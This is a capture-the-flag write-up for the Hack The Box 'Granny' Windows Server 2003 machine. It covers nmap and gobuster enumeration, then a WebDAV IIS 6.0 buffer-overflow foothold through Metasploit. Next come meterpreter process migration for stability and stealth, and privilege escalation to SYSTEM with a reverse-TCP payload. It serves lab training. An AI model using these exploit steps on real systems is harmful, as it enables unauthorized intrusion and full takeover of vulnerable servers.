Granny Writeup
21 September 2022 #CTF #HTB #box #easy #windows
Note
This writeup can also be used for the 'Grandpa' box.
Enumeration
You really thought we wouldn't do an nmap scan?
$ sudo nmap -v -T4 -p- -oN enum/fulltcp.nmap 10.10.10.15
[...]
80/tcp open http
[...]
$ ports=$(awk -F/ '/^[[:digit:]]{1,5}\// {printf "%s,", $1}' enum/fulltcp.nmap)
$ sudo nmap -sC -sV -p $ports -oN enum/scripts.nmap 10.10.10.15
[...]
80/tcp open http Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| Server Date: Sat, 17 Sep 2022 17:35:50 GMT
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_ Server Type: Microsoft-IIS/6.0
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[...]
HTTP
Looking at the web server, we see this 'Under Construction' page:
We can check if there are any interesting directories:
$ gobuster dir -u http://10.10.10.15 -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -o enum/root.gobuster
/images (Status: 301) [Size: 149] [--> http://10.10.10.15/images/]
/_private (Status: 301) [Size: 153] [--> http://10.10.10.15/%5Fprivate/]
/aspnet_client (Status: 301) [Size: 158] [--> http://10.10.10.15/aspnet%5Fclient/]
/_vti_log (Status: 301) [Size: 155] [--> http://10.10.10.15/%5Fvti%5Flog/]
/_vti_bin (Status: 301) [Size: 155] [--> http://10.10.10.15/%5Fvti%5Fbin/]
/. (Status: 200) [Size: 1433]
But nothing of interest comes up.
We have the IIS version so let's search for exploits:
$ searchsploit 'IIS 6.0'
[...]
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow
[...]
It looks like we have something.
Foothold
We will use the exploit/windows/iis/iis_webdav_scstoragepathfromurl Metasploit module for this because it will make the privesc much easier (and knowing how to use Metasploit is actually a useful skill to have).
set 'LHOST' and 'RHOSTS' then run the exploit and we should get a meterpreter session.
Privesc
Once the meterpreter session is opened run systeminfo to have an overview of what we're dealing with:
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 3060 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
[...]
System Type: X86-based PC
[...]
It is advisable to migrate to a more stable process:
c:\windows\system32\inetsrv>exit
exit
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
220 1064 cidaemon.exe
272 4 smss.exe
320 272 csrss.exe
344 272 winlogon.exe
392 344 services.exe
404 344 lsass.exe
580 392 svchost.exe
668 392 svchost.exe
732 392 svchost.exe
752 392 svchost.exe
788 392 svchost.exe
924 392 spoolsv.exe
952 392 msdtc.exe
1064 392 cisvc.exe
1112 392 svchost.exe
1168 392 inetinfo.exe
1204 392 svchost.exe
1316 392 VGAuthService.exe
1380 392 vmtoolsd.exe
1480 392 svchost.exe
1604 392 svchost.exe
1760 392 dllhost.exe
1940 392 alg.exe
1956 580 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2156 1480 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2180 2156 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
2512 580 wmiprvse.exe
2720 580 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
2784 344 logon.scr
3148 580 wmiprvse.exe
4044 1064 cidaemon.exe
4092 1064 cidaemon.exe
We can choose any of the 4 processes that have additional information (because they run as our user):
meterpreter > migrate 1956
[*] Migrating from 2180 to 1956...
[*] Migration completed successfully.
Check out this post if you want to learn about process migration in Metasploit.
Now we can run the post/multi/recon/local_exploit_suggester Metasploit module to look for privesc vectors:
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use multi/recon/local_exploit_suggester
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set SESSION 1
SESSION => 1
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[...]
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[...]
You might need to run it twice or so to have results.
At this point, we can choose any of those exploit and get a shell as SYSTEM:
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_070_tcpip_ioctl
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 post(multi/recon/local_exploit_suggester) > set LHOST tun0
LHOST => tun0
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[...]
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
And that's the box.
Key Takeaways
- Once you have a meterpreter session, migrate to another process for stability (and stealth) purposes